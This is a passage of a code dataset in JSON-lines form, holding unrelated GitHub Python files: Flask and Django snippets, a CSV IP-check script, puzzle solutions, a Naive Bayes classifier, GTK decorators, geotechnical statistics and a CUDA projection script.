redirect('/count')\n@app.route('/destroy_session')\ndef destroy_session():\n\tprint('count')\n\tif 'count' in session:\n\t\tprint('key exists!')\n\telse:\n\t\tprint(\"no\"*50)\n\t# session.clear()\t\t# clears all keys\n\tsession.pop('count')\t\t# clears a specific key\n\treturn redirect('/')\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"oohasri/python","sub_path":"flask/flask_fundamentals/counter/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"42788626590","text":"#Goal: collect all events of unauthorized traffic over the network\n\n# # import csv module\nimport csv\n\n# # name and open the employee and 
access CSV files\n# # create a csv reader object and print\n\n# #Sample\n# # with open('employees.csv') as employees_csv:\n# #     csv_emp_reader = csv.DictReader(employees_csv)\n# #     for employee in csv_emp_reader:\n# #         print(employee['id'], employee['first_name'] ,employee['last_name'], employee['email'], employee['ip_address'])\n\nwith open('access_list.csv') as access_csv, open('employees.csv') as employees_csv:\n    csv_access_reader = csv.DictReader(access_csv)\n    csv_emp_reader = csv.DictReader(employees_csv)\n\n    # collect every known employee IP, then flag access entries whose source IP\n    # (assumed to be the first column of access_list.csv) is not among them\n    employee_ips = {employee['ip_address'] for employee in csv_emp_reader}\n    ip_field = csv_access_reader.fieldnames[0]\n    for access in csv_access_reader:\n        if access[ip_field] not in employee_ips:\n            print(access)\n\n\n","repo_name":"dforbeck/PythonFundamentals","sub_path":"challenge_csv.py","file_name":"challenge_csv.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12474812278","text":"lines = [] \nwith open('day07input.txt', 'r') as inpfile:\n    while True:\n        line = inpfile.readline().strip()\n        if line == '':\n            break\n        lines.append(line)\n\nvalues = {}\n \n\ndef getvalue(id, depth):\n    global values\n    margin = depth*' '\n    depth = depth + 1\n    try:\n        result = values[id]\n        return result\n    except:\n        pass\n    try:\n        result = int(id)\n    except:\n        result = -1\n    if not result == -1:\n        print(margin,'Found', id, 'value:', result)\n        values[id] = result\n        print(values)\n        return result\n    keyline = ''\n    for line in lines:\n        if line.split('->')[-1].strip() == id:\n            keyline = line.split('->')[0].strip()\n            print(margin, 'For', id, 'found instruction line', line)\n            break\n    if keyline == '':\n        print('Error! No line found for', id)\n        input()\n    \n    if len(keyline.split()) == 1:\n        sid = keyline.split()[0]\n        result = getvalue(sid, depth)\n        print(margin, 'Found', id, 'value:', result)\n        values[id] = result\n        return result\n    \n    if keyline.split()[0] == 'NOT':\n        sid = keyline.split()[1]\n        result = 65535 - getvalue(sid, depth)\n        print(margin,'Found', id, 'value:', result)\n        values[id] = result\n        return result\n\n    if keyline.split()[1] == 'OR':\n        sid1 = keyline.split()[0]\n        sid2 = keyline.split()[2]\n        result = getvalue(sid1, depth) | getvalue(sid2, depth)\n        print(margin, 'Found', id, 'value:', result)\n        values[id] = result\n        return result\n    \n    if keyline.split()[1] == 'AND':\n        sid1 = keyline.split()[0]\n        sid2 = keyline.split()[2]\n        result = getvalue(sid1, depth) & getvalue(sid2, depth)\n        print(margin, 'Found', id, 'value:', result)\n        values[id] = result\n        return result\n    \n    if keyline.split()[1] == 'LSHIFT':\n        sid = keyline.split()[0]\n        i = int(keyline.split()[2])\n        result = getvalue(sid, depth) << i\n        print(margin,'Found', id, 'value:', result)\n        values[id] = result\n        return result\n\n    if keyline.split()[1] == 'RSHIFT':\n        sid = keyline.split()[0]\n        i = int(keyline.split()[2])\n        result = getvalue(sid, depth) >> i\n        print(margin, 'Found', id, 'value:', result)\n        values[id] = result\n        return result    \n\na = getvalue('a', 0)\n\nprint('a value is:', a)\ninput()\n\nvalues = {'b': a}\n\na = getvalue('a', 0)\n\nprint('New a value is:', a)\ninput()\n","repo_name":"aldragon-net/AoC","sub_path":"2015/day07-2015/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":2561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6846312766","text":"#reverseList - Write a function that reverses the values in the list (without creating a temporary array).\ndef reverseList(numbers):\n    # swap symmetric pairs; len//2 iterations handle both even and odd lengths\n    for i in 
range(len(numbers) // 2):\n        numbers[i],numbers[len(numbers)-1-i]=numbers[len(numbers)-1-i],numbers[i]\n    print(numbers)\n\nreverseList([5,3,1,4])\n\n#isPalindrome - Write a function that checks whether the given word is a palindrome (a word that spells the same backward)\nword = \"Madam\"\n\nword_lower = word.lower().replace(\" \", \"\")\n\nif word_lower == word_lower[::-1]:\n    print(\"It's a palindrome\")\nelse:\n    print(\"This is not a palindrome\")\n\n#coins - Write a function that determines how many quarters, dimes, nickels, and pennies to give to a customer for a change where you minimize the number of coins you give out.\ndef Coins(coin):\n    change=[]\n    change.append(coin//25)\n    change.append((coin%25)//10)\n    change.append(((coin%25)%10)//5)\n    change.append(((coin%25)%10)%5)\n    print(change)\n\nCoins(102)\n\n\n\n","repo_name":"melonijanice/Python_Learning","sub_path":"_python/Python_Fundamentals/TDD/Algos.py","file_name":"Algos.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"35680923107","text":"#\n# @lc app=leetcode id=662 lang=python3\n#\n# [662] Maximum Width of Binary Tree\n#\nfrom typing import Optional\nfrom collections import deque\nclass TreeNode:\n    def __init__(self, val=0, left=None, right=None):\n        self.val = val\n        self.left = left\n        self.right = right\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\n# BFS\nclass Solution:\n    def widthOfBinaryTree(self, root: Optional[TreeNode]) -> int:\n        q = deque([(root, 0, 0)])\n        curLevel = left = ans = 0\n        while q:\n            (node, level, pos) = q.pop()\n            if node.left:\n                q.appendleft((node.left, level + 1, pos * 2))\n            if node.right:\n                q.appendleft((node.right, level + 1, pos * 2 + 1))\n            if curLevel != level:\n                curLevel = level\n                left = pos\n            ans = max(ans, pos - left + 1)\n        return ans\n# @lc code=end\n# DFS\n# class Solution:\n#     def widthOfBinaryTree(self, root: Optional[TreeNode]) -> int:\n#         left = {}\n#         self.ans = 0\n#         def dfs(node, level, pos):\n#             if not node: return\n#             if level not in left: left[level] = pos\n#             self.ans = max(self.ans, pos - left[level] + 1)\n#             dfs(node.left, level + 1, pos * 2)\n#             dfs(node.right, level + 1, pos * 2 + 1)\n#         dfs(root, 0, 0)\n#         return self.ans\n\n","repo_name":"kranzCh/LeetcodePy","sub_path":"Solutions/662.maximum-width-of-binary-tree.py","file_name":"662.maximum-width-of-binary-tree.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73907653655","text":"from django.http import HttpResponse\nfrom django.shortcuts import render, redirect\nfrom .forms import RegistrationForm\n\n# Create your views here.\n\ndef register(request):\n    if request.method == 'POST':\n        form = RegistrationForm(request.POST, request.FILES)\n        if form.is_valid():\n            user = form.save()\n            # Perform any additional actions\n            return HttpResponse('registration_success')\n    else:\n        form = RegistrationForm()\n    \n    return render(request, 'register.html', {'form': form})","repo_name":"hridesh-net/graphicalpassword","sub_path":"graphpass/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"21423559901","text":"cubes = {tuple(map(int,l.split(','))) for l in open('18.txt')}\nsides 
= lambda x,y,z: {(x+1,y,z),(x-1,y,z),(x,y+1,z),(x,y-1,z),(x,y,z+1),(x,y,z-1)}\n\n# determine grid boundaries\nmin_c, max_c = float('inf'), float('-inf')\nfor x, y, z in cubes:\n min_c = min(min_c, x, y, z)\n max_c = max(max_c, x, y, z)\nmin_c -= 1\nmax_c += 1\n\nseen = set()\ntodo = [(min_c, min_c, min_c)]\n# flood fill, keep track of faces seen\nwhile todo:\n here = todo.pop()\n for s in (sides(*here) - cubes - seen):\n if all(min_c <= c <= max_c for c in s):\n todo.append(s)\n seen |= {here}\n\n# for the cubes, sum all faces seen by the flood fill\nres = 0 \nfor c in cubes:\n for s in sides(*c):\n if s in seen: res += 1\n\nprint(res)","repo_name":"MelvinMallari/Advent-of-Code-2022-","sub_path":"18/18_2.py","file_name":"18_2.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38415816455","text":"# Jonathan Chen, 20722167\n# University of Waterloo\n# February 11, 2022\n\nimport re \nimport pickle\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport pickle\nimport os\nimport numpy as np\nimport warnings\nimport sys\n\ndef read_files(file_name, isLabel):\n # Read data from files into a list\n lines = []\n with open(file_name) as file:\n for line in file:\n string = re.sub(\"[\\\"\\n]\", \"\", line)\n if isLabel:\n lines.append(int(string))\n else:\n lines.append(string)\n \n return lines\n\ndef create_text_vectors(feature, train, val, test):\n # Transform the dataset into n-grams\n if feature == \"unigrams\":\n count_vect = CountVectorizer(ngram_range=(1,1))\n elif feature == \"bigrams\":\n count_vect = CountVectorizer(ngram_range=(2,2))\n elif feature == \"unigrams+bigrams\":\n count_vect = CountVectorizer(ngram_range=(1,2))\n else:\n print(\"Unable to create text vectors\")\n exit(1)\n \n X_train = count_vect.fit_transform(train)\n X_val = count_vect.transform(val)\n X_test = count_vect.transform(test)\n\n return X_train, X_val, X_test, count_vect\n\ndef train_model(X_train, X_val, train_labels, val_labels):\n # INITIAL PARAMETER SEARCH\n # alpha_range = [0, 0.5, 1, 2, 5, 10, 25, 50, 100]\n\n # SECOND PARAMETER SEARCH\n alpha_range = np.linspace(0, 1.5, 16)\n\n best_alpha = 0\n best_accuracy = 0\n\n for alpha in alpha_range:\n clf = MultinomialNB(alpha=alpha)\n clf.fit(X_train, train_labels)\n Y_pred = clf.predict(X_val)\n if (accuracy_score(val_labels, Y_pred) > best_accuracy):\n best_accuracy = accuracy_score(val_labels, Y_pred)\n best_alpha = alpha\n \n best_model = MultinomialNB(alpha=best_alpha)\n best_model.fit(X_train, train_labels)\n return best_model\n\ndef test_model(clf, X_test, test_labels, model):\n Y_pred = clf.predict(X_test)\n\n print(model + \": Accuracy Score is \" + str(accuracy_score(test_labels, Y_pred)))\n\ndef run_models(train, val, test, train_ns, val_ns, test_ns, train_labels, val_labels, test_labels):\n models = ['unigrams stopwords', 'bigrams stopwords', 'unigrams+bigrams stopwords',\n 'unigrams no stopwords', 'bigrams no stopwords', 'unigrams+bigrams no stopwords']\n \n output_filenames = ['mnb_uni.pkl', 'mnb_bi.pkl', 'mnb_uni_bi.pkl', 'mnb_uni_ns.pkl', 'mnb_bi_ns.pkl', 'mnb_uni_bi_ns.pkl']\n\n if not os.path.exists(\"data\"):\n os.makedirs(\"data\")\n\n for i, model in enumerate(models):\n # Train the models with stopwords\n if model.split(\" \")[1] == 'stopwords':\n X_train, X_val, X_test, text_vectors = create_text_vectors(model.split(\" \")[0], train, 
val, test)\n            best_model = train_model(X_train, X_val, train_labels, val_labels)\n            \n            test_model(best_model, X_test, test_labels, model)\n        else:\n            # Train the models without stopwords\n            X_train, X_val, X_test, text_vectors = create_text_vectors(model.split(\" \")[0], train_ns, val_ns, test_ns)\n            best_model = train_model(X_train, X_val, train_labels, val_labels)\n            \n            test_model(best_model, X_test, test_labels, model)\n        \n        # Save the model to a pickle\n        model_pkl = open(\"data/\" + output_filenames[i], \"wb\")\n        pickle.dump([text_vectors, best_model], model_pkl)\n        model_pkl.close()\n\ndef main(file_path):\n    # Read in the input files\n    train = read_files(file_path+\"/train.csv\", False)\n    val = read_files(file_path + \"/val.csv\", False)\n    test = read_files(file_path+\"/test.csv\", False)\n    \n    train_ns = read_files(file_path+\"/train_ns.csv\", False)\n    val_ns = read_files(file_path + \"/val_ns.csv\", False)\n    test_ns = read_files(file_path+\"/test_ns.csv\", False)\n\n    train_labels = read_files(file_path+\"/train_labels.csv\", True)\n    val_labels = read_files(file_path+\"/val_labels.csv\", True)\n    test_labels = read_files(file_path+\"/test_labels.csv\", True)\n\n    run_models(train, val, test, train_ns, val_ns, test_ns, train_labels, val_labels, test_labels)\n\nif __name__ == \"__main__\":\n    if len(sys.argv) != 2:\n        print(\"ERROR: Invalid number of inputs\")\n        exit(1)\n\n    input_folder_path = sys.argv[1]\n\n    warnings.filterwarnings(\"ignore\")\n    main(input_folder_path)\n","repo_name":"jonchen99/msci-nlp-w22","sub_path":"Assignment2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9739396949","text":"import sys\nimport threading\nimport time\nimport unittest\nimport yaml\nimport sleekxmpp\n\nfrom pdb import set_trace\nfrom microblog.bot import Bot\nfrom microblog import db\n\n_bot = None\n\n\nclass TestCase(unittest.TestCase):\n    def __init__(self, *args, **kwargs):\n        global _bot\n        super(TestCase, self).__init__(*args, **kwargs)\n\n        self.cfg = yaml.load(open(sys.argv[1]).read())\n        db.init(self.cfg['database'])\n        _bot = Bot(**self.cfg['component'])\n\n        threading.Thread(target = _bot.start).start()\n\n\n    def test_send_message(self):\n        client = sleekxmpp.ClientXMPP('user2@coolananas.com.au', 'user2password')\n        client.connect((self.cfg['component']['server'], self.cfg['component']['port']))\n        client.sendMessage('user1@coolbananas.com.au', 'test')\n        self.assertEqual(True, False)\n\n\n\nif __name__ == '__main__':\n    try:\n        unittest.main(argv = sys.argv[:1])\n    finally:\n        time.sleep(1)\n        if _bot is not None:\n            _bot.stop()\n\n","repo_name":"cleartext/ximpp-server","sub_path":"tests/testsuite.py","file_name":"testsuite.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"68"} +{"seq_id":"27695776411","text":"from widgets.widgets import QuestionDialog\nimport functools\nfrom gi.repository.Gdk import Cursor\n\ndef exc_try(func):\n    \"\"\"Run the decorated function, reporting success or the raised error via an 'updated' signal\"\"\"\n    @functools.wraps(func)\n    def wrapper(*args, **kwargs):\n        try:\n            func(*args, **kwargs)\n            args[0].emit('updated','Done', 1)\n        except Exception as e:\n            args[0].emit('updated',str(e), 0)\n\n    return wrapper\n\ndef check_dialog(func):\n    \"\"\"Ask for confirmation in a question dialog before running the decorated function\"\"\"\n    @functools.wraps(func)\n    def wrapper(widget, *args, **kwargs):\n        dialog = QuestionDialog(widget, \"\")\n        response = 
dialog.run()\n\n        if response == -8:#Gtk.ResponseType.YES\n            func(widget, *args, **kwargs)\n        elif response == -9:pass #Gtk.ResponseType.NO\n        dialog.destroy()\n    return wrapper\n\ndef wait(func):\n    \"\"\"Show a busy ('wait') cursor while the decorated function runs\"\"\"\n    @functools.wraps(func)\n    def wrapper(widget, *args, **kwargs):\n        display = widget.get_display()\n        cursor = Cursor.new_from_name(display, 'wait')\n        cursor_d = Cursor.new_from_name(display, 'default')\n\n        toplevel = widget.get_toplevel()\n        window = toplevel.get_window()\n        window.set_cursor(cursor)\n\n        def finish_cb():\n            window.set_cursor(cursor_d)\n\n        func(widget, *args, finish_cb, **kwargs)\n    return wrapper\n","repo_name":"kiwinaut/tagger","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"17537553678","text":"__author__ = 'Matteo'\n__doc__='''This script combines the multiple pickled blast hits.'''\n\nimport csv\nimport pickle\nfrom Bio import SeqIO\nfrom Bio import Entrez\nmegageneball={}\nminigeneball={}\nstrains={}\nqueries=['fpvA1','fpvA2','fpvA3']\nfor q in queries:\n    file=open(q+'_pickled.dat','rb')\n    geneball=pickle.load(file)\n    for strain in geneball.keys():\n        #megageneball.setdefault(strain, []).extend(geneball[strain])\n        if not strain in minigeneball.keys():\n            minigeneball[strain]=[geneball[strain][0]]\n#print(len(megageneball))\nfile=open('fpvA_pickled.dat','wb')\npickle.dump(minigeneball,file)\n\n###PART A. download all matches.\n###PART B. gene clean-up. delete small matches. delete low similarity matches\n###PART C. gene numbers per strain\n###PART D. fasta of common.","repo_name":"matteoferla/pyoverdine","sub_path":"pyo_combiner.py","file_name":"pyo_combiner.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10688410116","text":"from .pggeotec_utilities import utilsFunctions as utils\nfrom scipy.stats import skew, spearmanr, pearsonr, kurtosis, variation, probplot, linregress\nfrom numpy import mean, std, amin, median, amax, var, percentile, sort, arange\n\n\nclass statFunctions:\n    def statisticsDescritive(layer, fieldName, useSelection):\n        try:\n            statistics = {'mean': 0, 'stddev':0, 'median': 0, 'minimun': 0, 'maximum': 0, 'variance': 0, 'skewness': 0, 'kurtosis': 0, 'cv': 0, 'upper_quartile': 0, 'lower_quartile': 0, 'count':0}\n            resultData = utils.useSelectionOneVariable(layer, fieldName, useSelection)\n            statistics['mean'] = round(mean(resultData),2)\n            statistics['stddev'] = round(std(resultData),2)\n            statistics['median'] = round(median(resultData),2)\n            statistics['minimun'] = round(amin(resultData),2)\n            statistics['maximum'] = round(amax(resultData),2)\n            statistics['variance'] = round(var(resultData),2)\n            statistics['skewness'] = round(skew(resultData),2)\n            statistics['kurtosis'] = round(kurtosis(resultData),2)\n            statistics['cv'] = round(variation(resultData),2)\n            statistics['upper_quartile'] = round(percentile(resultData, 75),2)\n            statistics['lower_quartile'] = round(percentile(resultData, 25),2)\n            statistics['count'] = len(resultData)\n            return statistics\n        except (Exception) as error:\n            print('Check function statisticsDescritive. Cannot execute function. 
Reason %s' % (error)) \n \n def correlationAnalysis(layer, fieldName1, fieldName2, useSelection):\n try:\n statistics1 = {'pearson': 0, 'spearman': 0, 'mean': 0, 'stddev':0, 'median': 0, 'minimun': 0, 'maximum': 0, 'variance': 0, 'skewness': 0, 'kurtosis': 0, 'cv': 0, 'upper_quartile': 0, 'lower_quartile': 0, 'count':0}\n statistics2 = {'pearson': 0, 'spearman': 0, 'mean': 0, 'stddev':0, 'median': 0, 'minimun': 0, 'maximum': 0, 'variance': 0, 'skewness': 0, 'kurtosis': 0, 'cv': 0, 'upper_quartile': 0, 'lower_quartile': 0, 'count':0}\n resultDataOne = utils.useSelectionOneVariable(layer, fieldName1, useSelection)\n resultDataTwo = utils.useSelectionOneVariable(layer, fieldName2, useSelection)\n resultDataOne, resultDataTwo = utils.checkEqualNumberTwoVariables(resultDataOne, resultDataTwo)\n statistics1['mean'] = round(mean(resultDataOne),2)\n statistics1['stddev'] = round(std(resultDataOne),2)\n statistics1['median'] = round(median(resultDataOne),2)\n statistics1['minimun'] = round(amin(resultDataOne),2)\n statistics1['maximum'] = round(amax(resultDataOne),2)\n statistics1['variance'] = round(var(resultDataOne),2)\n statistics1['skewness'] = round(skew(resultDataOne),2)\n statistics1['kurtosis'] = round(kurtosis(resultDataOne),2)\n statistics1['cv'] = round(variation(resultDataOne),2)\n statistics1['upper_quartile'] = round(percentile(resultDataOne, 75),2)\n statistics1['lower_quartile'] = round(percentile(resultDataOne, 25),2)\n statistics1['count'] = len(resultDataOne)\n statistics1['pearson'] = pearsonr(resultDataOne, resultDataTwo)\n statistics1['spearman'] = spearmanr(resultDataOne, resultDataTwo)\n statistics2['mean'] = round(mean(resultDataTwo),2)\n statistics2['stddev'] = round(std(resultDataTwo),2)\n statistics2['median'] = round(median(resultDataTwo),2)\n statistics2['minimun'] = round(amin(resultDataTwo),2)\n statistics2['maximum'] = round(amax(resultDataTwo),2)\n statistics2['variance'] = round(var(resultDataTwo),2)\n statistics2['skewness'] = round(skew(resultDataTwo),2)\n statistics2['kurtosis'] = round(kurtosis(resultDataTwo),2)\n statistics2['cv'] = round(variation(resultDataTwo),2)\n statistics2['upper_quartile'] = round(percentile(resultDataTwo, 75),2)\n statistics2['lower_quartile'] = round(percentile(resultDataTwo, 25),2)\n statistics2['count'] = len(resultDataTwo)\n statistics2['pearson'] = statistics1['pearson']\n statistics2['spearman'] = statistics1['spearman']\n return statistics1, statistics2, resultDataOne, resultDataTwo\n except (Exception) as error:\n print('Check function correlationAnalysis. Cannot execute function. Reason %s' % (error)) \n \n def qqPlotData(layer, fieldName, useSelection):\n try:\n resultData = utils.useSelectionOneVariable(layer, fieldName, useSelection)\n res = probplot(resultData, dist='norm', plot=None)\n osm , osr = res[0]\n slope, intercept, r = res[1]\n slope, intercept, r, prob, sterrest = linregress(osm, osr)\n [xmin, xmax, ymin, ymax] = [amin(osm), amax(osm), amin(osr), amax(osr)]\n [posx, posy] = [(xmin + 0.70 * (xmax - xmin)), (ymin + 0.01 * (ymax - ymin))]\n return posx, posy, osm , osr, slope, intercept, r\n except (Exception) as error:\n print('Check function qqPlotData. Cannot execute function. Reason %s' % (error))\n\n def ecdfData(layer, fieldName, useSelection):\n try:\n resultData = utils.useSelectionOneVariable(layer, fieldName, useSelection)\n x = sort(resultData)\n n = x.size\n y = (arange(1, n+1)) / n\n return (x,y)\n except (Exception) as error:\n print('Check function ecdfData. Cannot execute function. 
Reason %s' % (error)) \n \n    def calculateGridValues (resultDataLatCk, resultDataLongCk, resultDataElevCk):\n        try:\n            xMax, xMin = amax(resultDataLatCk), amin(resultDataLatCk)\n            yMax, yMin = amax(resultDataLongCk), amin(resultDataLongCk)\n            zMax, zMin = amax(resultDataElevCk), amin(resultDataElevCk)\n            return xMax, xMin, yMax, yMin, zMax, zMin\n        except (Exception) as error:\n            print('Check function calculateGridValues. Cannot execute function. Reason %s' % (error))\n\n","repo_name":"bro-geo/geotechnical-data-explorer","sub_path":"pggeotec_stat.py","file_name":"pggeotec_stat.py","file_ext":"py","file_size_in_byte":6145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38613878525","text":"# Brute force calculation of MIP in spherical coordinates\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport re\nimport tifffile as tff\nfrom math import *\nimport itertools\nfrom timeit import default_timer as timer\nfrom numbapro import cuda, jit, float32, uint16, int16\nfrom track_util import readXMLAmat\n\ndef readStackImage(filename, sType = 'uint16'):\n    with tff.TiffFile(filename) as tif:\n        image = tif.asarray().astype(sType)\n        size = image.shape\n    \n    return image, size\n\ndef rayPoints(center, theta, phi, r_max, n_points):\n\n    r = float(r_max)/n_points*(np.arange(n_points) + 1)\n    points = np.zeros((3, n_points))\n    points[0,:] = center[0] + r*sin(theta)*cos(phi)\n    points[1,:] = center[1] + r*sin(theta)*sin(phi)\n    points[2,:] = center[2] + r*cos(theta)\n\n    return r, points\n\ndef calcTrilinearWeights(x, y, z, size):\n    ijk = [(), ]*8\n    weight = [0, ]*8\n    cnt = 0\n    for i in [floor(x), ceil(x)]:\n        for j in [floor(y), ceil(y)]:\n            for k in [floor(z), ceil(z)]:\n                ijk[cnt] = (k, i, j)\n                if ((i < size[1]) and (j < size[2]) and (k < size[0])\n                    and (i >= 0) and (j >= 0) and (k >= 0)):\n                    weight[cnt] = (1 - abs(x-i))*(1 - abs(y-j))*(1 - abs(z-k))\n                else:\n                    weight[cnt] = 0\n                cnt += 1\n\n    return ijk, weight\n\ndef calcRay(all_theta, all_phi, image, n_points, r_max, center, all_max_val, r_of_maxval):\n    \n    size = image.shape\n    # iterate over all the angles to get projection\n    cnt_theta = 0\n    for theta in all_theta:\n        cnt_phi = 0\n        for phi in all_phi:\n            # calculate all the points coordinates\n            r, points = rayPoints(center, theta, phi, r_max, n_points)\n            # iterate over all the r to get maximum\n            max_val = 0\n            r_aux = 0\n            for cnt_point in range(n_points):\n                point = points[:,cnt_point]\n                # calculate trilinear interpolation\n                ijk, weights = calcTrilinearWeights(point[0], point[1], point[2], size)\n                val = 0\n                for index, weight in zip(ijk, weights):\n                    if weight > 0:\n                        val += weight*image[index]\n                # check if maximum\n                if val > max_val:\n                    max_val = val\n                    r_aux = r[cnt_point]\n\n            # write output\n            if r_aux > 0:\n                r_of_maxval[cnt_theta, cnt_phi] = r_aux\n                all_max_val[cnt_theta, cnt_phi] = max_val\n\n            # add counter for phi\n            cnt_phi += 1\n\n        # add counter for theta\n        cnt_theta += 1\n\n@cuda.jit(argtypes = [float32[:], float32[:], uint16[:,:,:], float32[:], float32[:], float32[:,:], float32[:,:]])\ndef calcRay_CUDA(all_theta, all_phi, image, r, center, all_max_val, r_of_maxval):\n\n    tx = cuda.threadIdx.x\n    ty = cuda.threadIdx.y\n    bx = cuda.blockIdx.x\n    by = cuda.blockIdx.y\n    bw = cuda.blockDim.x\n    bh = cuda.blockDim.y\n    xim = tx + bx * bw\n    yim = ty + by * bh\n\n    xy_max = all_max_val.shape\n\n    if (xim < xy_max[0]) and (yim < xy_max[1]):\n\n        theta = all_theta[xim]\n        phi = all_phi[yim]\n        size = image.shape
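\n        # each thread handles one (theta, phi) ray; the nested 2x2x2 loop below trilinearly interpolates the stack at every sample point along the ray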
\n        n_points = r.shape[0]\n\n        max_val = 0\n        r_aux = 0\n        for cnt_point in range(n_points):\n            x = center[0] + r[cnt_point]*sin(theta)*cos(phi)\n            y = center[1] + r[cnt_point]*sin(theta)*sin(phi)\n            z = center[2] + r[cnt_point]*cos(theta)\n            val = 0\n            for ii in range(2):\n                i = int16(floor(x) if ii == 0 else ceil(x))\n                w1 = x-i if x>i else i-x \n                for jj in range(2):\n                    j = int16(floor(y) if jj == 0 else ceil(y))\n                    w2 = y-j if y>j else j-y \n                    for kk in range(2):\n                        k = int16(floor(z) if kk == 0 else ceil(z))\n                        w3 = z-k if z>k else k-z\n                        if ((i < size[1]) and (j < size[2]) and (k < size[0])\n                            and (i >= 0) and (j >= 0) and (k >= 0)):\n                            weight = (1 - w1)*(1 - w2)*(1 - w3)\n                            val += weight*image[k,i,j]\n\n            # check if maximum\n            if val > max_val:\n                max_val = val\n                scale = 16\n                r_aux = x*x + y*y + scale*scale*z*z\n\n        # write output\n        r_of_maxval[xim, yim] = r_aux\n        all_max_val[xim, yim] = max_val \n\n# Read the image\nimage_path = \"C:\\\\Users\\\\olimpio\\\\Documents\\\\data\\\\XY-point-5\\\\slices\\\\T00001\\\\T00001.tif\"\nimage, size = readStackImage(image_path)\n\ncenter = np.array([size[1]/2,size[2]/2,0], dtype = np.float32)\nr_max = np.amax(size)/2 + 2\n\nn_points = 50\nn_theta = 50\nn_phi = 50\n\nr = float(r_max)/n_points*(np.arange(n_points) + 1)\nr = r.astype(np.float32)\n\nall_theta = (pi/n_theta)*np.arange(n_theta, dtype = np.float32)\nall_phi = (2*pi/n_phi)*np.arange(n_phi, dtype = np.float32) - pi\n\ndt = all_theta[1]\ndp = all_phi[1]+pi\ndr = r[0]\n\nprint(dr, dt, dp)\nprint(r_max*dt, r_max*dp)\n\nr_of_maxval = np.zeros((n_theta, n_phi), dtype = np.float32)\nall_max_val = np.zeros((n_theta, n_phi), dtype = np.float32)\nall_max_valcomp = np.zeros((n_theta, n_phi), dtype = np.float32)\nr_of_maxvalcomp = np.zeros((n_theta, n_phi), dtype = np.float32)\n\n# s = timer()\n# calcRay(all_theta, all_phi, image, n_points, r_max, center, all_max_valcomp, r_of_maxval)\n# e = timer()\n# print(e-s)\n\n# pix_phi, pix_theta = np.meshgrid(np.array(all_phi), np.array(all_theta))\n# ax = plt.subplot(2,1,1)\n# ax.contourf(pix_phi, pix_theta, all_max_valcomp,\n#     zorder = 0, cmap = cm.Greys_r)\n# ax.invert_yaxis()\n\n# ax = plt.subplot(2,1,2)\n# ax.contourf(pix_phi, pix_theta, r_of_maxvalcomp,\n#     zorder = 0)\n# ax.invert_yaxis()\n\nnThreads = (16,16)\nnBlocks = (ceil(n_theta/nThreads[0]), ceil(n_phi/nThreads[1]))\nprint(nBlocks)\n\ndate = \"2015_6_22_15_33_43\"\nxml_path = \"D:\\\\image_software\\\\results\\\\GMEMtracking3D_\"+date+\"\\\\XML_finalResult_lht_bckgRm\\\\GMEMfinalResult_frame????.xml\"\n\n# CUDA call of the image\ns = timer()\nd_theta = cuda.to_device(all_theta)\nd_phi = cuda.to_device(all_phi)\nd_image = cuda.to_device(image)\nd_r = cuda.to_device(r)\nd_center = cuda.to_device(center)\nd_max_val = cuda.device_array_like(all_max_val)\nd_r_max = cuda.device_array_like(r_of_maxval)\ncalcRay_CUDA[nBlocks, nThreads](d_theta, d_phi, d_image, d_r, d_center, d_max_val, d_r_max)\nd_max_val.copy_to_host(all_max_val)\nd_r_max.copy_to_host(r_of_maxval)\ne = timer()\nprint(e-s)\n\nn_time = 10\npos = readXMLAmat(xml_path, n_time)\n\n# Calculate the points coordinates\npos_arr = np.asarray(pos[0][0:3])\nn_cells = pos_arr.shape[1]\nangles = np.zeros((3,n_cells))\nfor cell in range(n_cells):\n    point = pos_arr[:,cell] - center\n    if point[0] > 0:\n        angles[1,cell] = atan(point[1]/point[0])\n    else:\n        adj = -pi if point[1] < 0 else pi \n        angles[1,cell] = atan(point[1]/point[0]) + adj\n    rho = sqrt(point[0]**2 + point[1]**2)\n    angles[0,cell] = atan(rho/point[2])\n    angles[2,cell] = sqrt(rho**2 + (16*point[2])**2)
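\n    # the factor 16 matches scale = 16 used for r_aux in calcRay_CUDA, presumably the axial (z) voxel spacing relative to x/y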
